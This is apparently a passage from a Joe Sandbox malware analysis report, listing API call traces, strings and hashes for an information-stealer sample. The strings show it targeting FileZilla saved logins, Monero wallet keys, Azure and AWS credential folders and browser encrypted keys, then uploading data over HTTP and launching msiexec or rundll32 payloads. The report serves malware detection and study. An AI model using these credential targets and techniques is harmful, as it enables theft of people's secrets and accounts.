                              • lstrcat.KERNEL32(?,00000000), ref: 001C05E6
                              • lstrcat.KERNEL32(?,001D1688), ref: 001C05F5
                              • lstrcat.KERNEL32(?,password: ), ref: 001C0604
                              • lstrcat.KERNEL32(?,00000000), ref: 001C0617
                              • lstrcat.KERNEL32(?,001D1698), ref: 001C0626
                              • lstrcat.KERNEL32(?,001D169C), ref: 001C0635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001D0DB2), ref: 001C068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 1d305c3b9613aff27db20b56f95e236e1bc4767da31645465673d46401ca6ab7
                              • Instruction ID: 5f0d81ccf502ff719872e5b063eb3f403889386cee724a4928a46b8c1ff84350
                              • Opcode Fuzzy Hash: 1d305c3b9613aff27db20b56f95e236e1bc4767da31645465673d46401ca6ab7
                              • Instruction Fuzzy Hash: 0DD10EB1900208ABCB05EBE4DD96FEE7778AF38305F94451DF106A6191DF74EA06CB62
                              APIs
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001B4839
                                • Part of subcall function 001B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001B4849
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001B59F8
                              • StrCmpCA.SHLWAPI(?,00EEE498), ref: 001B5A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001B5B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00EEE478,00000000,?,00EE9D30,00000000,?,001D1A1C), ref: 001B5E71
                              • lstrlen.KERNEL32(00000000), ref: 001B5E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 001B5E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001B5E9A
                              • lstrlen.KERNEL32(00000000), ref: 001B5EAF
                              • lstrlen.KERNEL32(00000000), ref: 001B5ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 001B5EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 001B5F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 001B5F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 001B5F4C
                              • InternetCloseHandle.WININET(00000000), ref: 001B5FB0
                              • InternetCloseHandle.WININET(00000000), ref: 001B5FBD
                              • HttpOpenRequestA.WININET(00000000,00EEE448,?,00EED8E8,00000000,00000000,00400100,00000000), ref: 001B5BF8
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                              • InternetCloseHandle.WININET(00000000), ref: 001B5FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------$8$H$x
                              • API String ID: 874700897-67791069
                              • Opcode ID: 05da2054e171ee3f620b41302e16508ca5dd1518fb2849cfe518d2c292a227e3
                              • Instruction ID: c2a63ef5703d311400c6ef89e00a7b6182d2f40af8471dcf78974745ab5448d6
                              • Opcode Fuzzy Hash: 05da2054e171ee3f620b41302e16508ca5dd1518fb2849cfe518d2c292a227e3
                              • Instruction Fuzzy Hash: 2912CC7182011CABDB16EBA0DC96FEEB378BF34705F90419DB10A62191DF70AE49CB65
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001C8B60: GetSystemTime.KERNEL32(001D0E1A,00EE99A0,001D05AE,?,?,001B13F9,?,0000001A,001D0E1A,00000000,?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001C8B86
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001BCF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 001BD0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001BD0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 001BD208
                              • lstrcat.KERNEL32(?,001D1478), ref: 001BD217
                              • lstrcat.KERNEL32(?,00000000), ref: 001BD22A
                              • lstrcat.KERNEL32(?,001D147C), ref: 001BD239
                              • lstrcat.KERNEL32(?,00000000), ref: 001BD24C
                              • lstrcat.KERNEL32(?,001D1480), ref: 001BD25B
                              • lstrcat.KERNEL32(?,00000000), ref: 001BD26E
                              • lstrcat.KERNEL32(?,001D1484), ref: 001BD27D
                              • lstrcat.KERNEL32(?,00000000), ref: 001BD290
                              • lstrcat.KERNEL32(?,001D1488), ref: 001BD29F
                              • lstrcat.KERNEL32(?,00000000), ref: 001BD2B2
                              • lstrcat.KERNEL32(?,001D148C), ref: 001BD2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 001BD2D4
                              • lstrcat.KERNEL32(?,001D1490), ref: 001BD2E3
                                • Part of subcall function 001CA820: lstrlen.KERNEL32(001B4F05,?,?,001B4F05,001D0DDE), ref: 001CA82B
                                • Part of subcall function 001CA820: lstrcpy.KERNEL32(001D0DDE,00000000), ref: 001CA885
                              • lstrlen.KERNEL32(?), ref: 001BD32A
                              • lstrlen.KERNEL32(?), ref: 001BD339
                                • Part of subcall function 001CAA70: StrCmpCA.SHLWAPI(00EE8A28,001BA7A7,?,001BA7A7,00EE8A28), ref: 001CAA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 001BD3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                               • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 9445b9870407387db76582d4bfd77cc29e9687976dc87cce1c5a54171a9a214b
                              • Instruction ID: 616a5a73264a5da26c74eb351a148538bf883e9e7a6913af9cf289796ff70bef
                              • Opcode Fuzzy Hash: 9445b9870407387db76582d4bfd77cc29e9687976dc87cce1c5a54171a9a214b
                              • Instruction Fuzzy Hash: D4E1CAB1910108ABCB06EBA0DD96EEE777CBF34305F904159F506A7191DF35EA09CBA2
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001CA920: lstrcpy.KERNEL32(00000000,?), ref: 001CA972
                                • Part of subcall function 001CA920: lstrcat.KERNEL32(00000000), ref: 001CA982
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                                • Part of subcall function 001CA9B0: lstrlen.KERNEL32(?,00EE87F8,?,\Monero\wallet.keys,001D0E17), ref: 001CA9C5
                                • Part of subcall function 001CA9B0: lstrcpy.KERNEL32(00000000), ref: 001CAA04
                                • Part of subcall function 001CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001CAA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00EECE48,00000000,?,001D144C,00000000,?,?), ref: 001BCA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 001BCA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 001BCA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 001BCAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 001BCAD9
                              • StrStrA.SHLWAPI(?,00EECE00,001D0B52), ref: 001BCAF7
                              • StrStrA.SHLWAPI(00000000,00EECE60), ref: 001BCB1E
                              • StrStrA.SHLWAPI(?,00EED480,00000000,?,001D1458,00000000,?,00000000,00000000,?,00EE8A98,00000000,?,001D1454,00000000,?), ref: 001BCCA2
                              • StrStrA.SHLWAPI(00000000,00EED680), ref: 001BCCB9
                                • Part of subcall function 001BC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 001BC871
                                • Part of subcall function 001BC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 001BC87C
                              • StrStrA.SHLWAPI(?,00EED680,00000000,?,001D145C,00000000,?,00000000,00EE8B28), ref: 001BCD5A
                              • StrStrA.SHLWAPI(00000000,00EE88E8), ref: 001BCD71
                                • Part of subcall function 001BC820: lstrcat.KERNEL32(?,001D0B46), ref: 001BC943
                                • Part of subcall function 001BC820: lstrcat.KERNEL32(?,001D0B47), ref: 001BC957
                                • Part of subcall function 001BC820: lstrcat.KERNEL32(?,001D0B4E), ref: 001BC978
                              • lstrlen.KERNEL32(00000000), ref: 001BCE44
                              • CloseHandle.KERNEL32(00000000), ref: 001BCE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 512a7507a0af05d5b54677b28feb2c9a9179acdd81866e509fbeb98467656c45
                              • Instruction ID: f02bbe4e41e29e20df2ae187c025bd0f3fe5a4d5f60a577288fa6945ffd82f70
                              • Opcode Fuzzy Hash: 512a7507a0af05d5b54677b28feb2c9a9179acdd81866e509fbeb98467656c45
                              • Instruction Fuzzy Hash: EDE1DFB191010CABDB16EBA4DC96FEEB778AF34305F80415DF10667191DF30AA4ACB66
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              • RegOpenKeyExA.ADVAPI32(00000000,00EEADC8,00000000,00020019,00000000,001D05B6), ref: 001C83A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001C8426
                              • wsprintfA.USER32 ref: 001C8459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 001C847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 001C848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 001C8499
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: ca5d4d7c5f7854f20ed783c1d91925683a6fa41883098071a8e3993f146a5a88
                              • Instruction ID: 6b1fe142f2fda521c0897aa620dda28c8280fe8e3b255738c42aec5fb67d900b
                              • Opcode Fuzzy Hash: ca5d4d7c5f7854f20ed783c1d91925683a6fa41883098071a8e3993f146a5a88
                              • Instruction Fuzzy Hash: A8810DB191011CABDB29DB50CC95FEAB7B8BF28704F408299E109A6140DF71AF85CF95
                              APIs
                                • Part of subcall function 001C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001C8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001C4DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 001C4DCD
                                • Part of subcall function 001C4910: wsprintfA.USER32 ref: 001C492C
                                • Part of subcall function 001C4910: FindFirstFileA.KERNEL32(?,?), ref: 001C4943
                              • lstrcat.KERNEL32(?,00000000), ref: 001C4E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 001C4E59
                                • Part of subcall function 001C4910: StrCmpCA.SHLWAPI(?,001D0FDC), ref: 001C4971
                                • Part of subcall function 001C4910: StrCmpCA.SHLWAPI(?,001D0FE0), ref: 001C4987
                                • Part of subcall function 001C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 001C4B7D
                                • Part of subcall function 001C4910: FindClose.KERNEL32(000000FF), ref: 001C4B92
                              • lstrcat.KERNEL32(?,00000000), ref: 001C4EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 001C4EE5
                                • Part of subcall function 001C4910: wsprintfA.USER32 ref: 001C49B0
                                • Part of subcall function 001C4910: StrCmpCA.SHLWAPI(?,001D08D2), ref: 001C49C5
                                • Part of subcall function 001C4910: wsprintfA.USER32 ref: 001C49E2
                                • Part of subcall function 001C4910: PathMatchSpecA.SHLWAPI(?,?), ref: 001C4A1E
                                • Part of subcall function 001C4910: lstrcat.KERNEL32(?,00EEE438), ref: 001C4A4A
                                • Part of subcall function 001C4910: lstrcat.KERNEL32(?,001D0FF8), ref: 001C4A5C
                                • Part of subcall function 001C4910: lstrcat.KERNEL32(?,?), ref: 001C4A70
                                • Part of subcall function 001C4910: lstrcat.KERNEL32(?,001D0FFC), ref: 001C4A82
                                • Part of subcall function 001C4910: lstrcat.KERNEL32(?,?), ref: 001C4A96
                                • Part of subcall function 001C4910: CopyFileA.KERNEL32(?,?,00000001), ref: 001C4AAC
                                • Part of subcall function 001C4910: DeleteFileA.KERNEL32(?), ref: 001C4B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 382e7d00a000df86f7e673837c138a16e6f2520e727de550bfcd7e1dc0e0ec0a
                              • Instruction ID: 9389af1bf1fea7112e4f231210852f42b5cda9d67f08fa56fe05b4ce70d6d8da
                              • Opcode Fuzzy Hash: 382e7d00a000df86f7e673837c138a16e6f2520e727de550bfcd7e1dc0e0ec0a
                              • Instruction Fuzzy Hash: 294160BA94021877C710F7B0EC97FE93638AB34705F404558B249A61C1EFB49B89CB92
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001C906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: add8fcd9bfe4a3381c509359cf35f968f21d7d97573608c4aad2941f60c47cbb
                              • Instruction ID: a135448c933dcd7eada5eedfa5e28845a43687661d58eb8dc36d9ff4f4cb65b5
                              • Opcode Fuzzy Hash: add8fcd9bfe4a3381c509359cf35f968f21d7d97573608c4aad2941f60c47cbb
                              • Instruction Fuzzy Hash: 7A71CAB1910608ABDB14EBE4DC99FEEBBBDBF58700F108508F519A7290DB74E905CB61
                              APIs
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001C31C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001C335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001C34EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 01266e0db6336fbc4f38a623b2c34a8668046e71155cd6bdbe898a42425eb2e4
                              • Instruction ID: 4b115b609948a65518b51586a51c431004cc9aaa8bc349c1e797614fa0c4751c
                              • Opcode Fuzzy Hash: 01266e0db6336fbc4f38a623b2c34a8668046e71155cd6bdbe898a42425eb2e4
                              • Instruction Fuzzy Hash: C212ED7180010C9BDB1AEBA0DC92FEDB778AF34309F90415DE50666191EF74AB4ACF66
                              APIs
                                • Part of subcall function 001CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001CA7E6
                                • Part of subcall function 001B6280: InternetOpenA.WININET(001D0DFE,00000001,00000000,00000000,00000000), ref: 001B62E1
                                • Part of subcall function 001B6280: StrCmpCA.SHLWAPI(?,00EEE498), ref: 001B6303
                                • Part of subcall function 001B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001B6335
                                • Part of subcall function 001B6280: HttpOpenRequestA.WININET(00000000,GET,?,00EED8E8,00000000,00000000,00400100,00000000), ref: 001B6385
                                • Part of subcall function 001B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001B63BF
                                • Part of subcall function 001B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001B63D1
                                • Part of subcall function 001CA8A0: lstrcpy.KERNEL32(?,001D0E17), ref: 001CA905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001C5318
                              • lstrlen.KERNEL32(00000000), ref: 001C532F
                                • Part of subcall function 001C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001C8E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 001C5364
                              • lstrlen.KERNEL32(00000000), ref: 001C5383
                              • lstrlen.KERNEL32(00000000), ref: 001C53AE
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 77218fc700776970ab480eebfb93ee745dde0b26898ddafdcc426685b7f09fdd
                              • Instruction ID: 6391f72279048c3bab0c0e343e8ad9612cc6c9ac15b5bac88833d9e5b04d7b6b
                              • Opcode Fuzzy Hash: 77218fc700776970ab480eebfb93ee745dde0b26898ddafdcc426685b7f09fdd
                              • Instruction Fuzzy Hash: 9751A67091014CABDB19FF60D996FED7779AF70305F90401CE40A9A592EF34AB46CBA2
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 4b4f5b2fc13d579ba134dae314063d3f0f65b55ac28b906f78fd25cfd93e526e
                              • Instruction ID: 91151201e7aa55d3449372256949811296303c2edd4177416725183b071ee59c
                              • Opcode Fuzzy Hash: 4b4f5b2fc13d579ba134dae314063d3f0f65b55ac28b906f78fd25cfd93e526e
                              • Instruction Fuzzy Hash: 3DC16EB594021DABCB15EF60DC89FEA7378AF74304F00459DE50AA7291EB70EA85CF91
                              APIs
                                • Part of subcall function 001C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001C8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 001C42EC
                              • lstrcat.KERNEL32(?,00EEDEE8), ref: 001C430B
                              • lstrcat.KERNEL32(?,?), ref: 001C431F
                              • lstrcat.KERNEL32(?,00EECE78), ref: 001C4333
                                • Part of subcall function 001CA740: lstrcpy.KERNEL32(001D0E17,00000000), ref: 001CA788
                                • Part of subcall function 001C8D90: GetFileAttributesA.KERNEL32(00000000,?,001B1B54,?,?,001D564C,?,?,001D0E1F), ref: 001C8D9F
                                • Part of subcall function 001B9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 001B9D39
                                • Part of subcall function 001B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001B99EC
                                • Part of subcall function 001B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001B9A11
                                • Part of subcall function 001B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001B9A31
                                • Part of subcall function 001B99C0: ReadFile.KERNEL32(000000FF,?,00000000,001B148F,00000000), ref: 001B9A5A
                                • Part of subcall function 001B99C0: LocalFree.KERNEL32(001B148F), ref: 001B9A90
                                • Part of subcall function 001B99C0: CloseHandle.KERNEL32(000000FF), ref: 001B9A9A
                                • Part of subcall function 001C93C0: GlobalAlloc.KERNEL32(00000000,001C43DD,001C43DD), ref: 001C93D3
                              • StrStrA.SHLWAPI(?,00EEDE10), ref: 001C43F3
                              • GlobalFree.KERNEL32(?), ref: 001C4512
                                • Part of subcall function 001B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001B4EEE,00000000,00000000), ref: 001B9AEF
                                • Part of subcall function 001B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,001B4EEE,00000000,?), ref: 001B9B01
                                • Part of subcall function 001B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001B4EEE,00000000,00000000), ref: 001B9B2A
                                • Part of subcall function 001B9AC0: LocalFree.KERNEL32(?,?,?,?,001B4EEE,00000000,?), ref: 001B9B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 001C44A3
                              • StrCmpCA.SHLWAPI(?,001D08D1), ref: 001C44C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 001C44D2
                              • lstrcat.KERNEL32(00000000,?), ref: 001C44E5
                              • lstrcat.KERNEL32(00000000,001D0FB8), ref: 001C44F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true
                              • Associated: 00000000.00000002.2069729553.00000000001B0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000261000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.000000000026D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.0000000000292000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069756680.00000000003FA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000059D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000067B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.000000000069D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2069952996.00000000006B6000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2073760170.00000000006B7000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2074518214.0000000000859000.00000040.00000001.01000000.00000003.sdmp
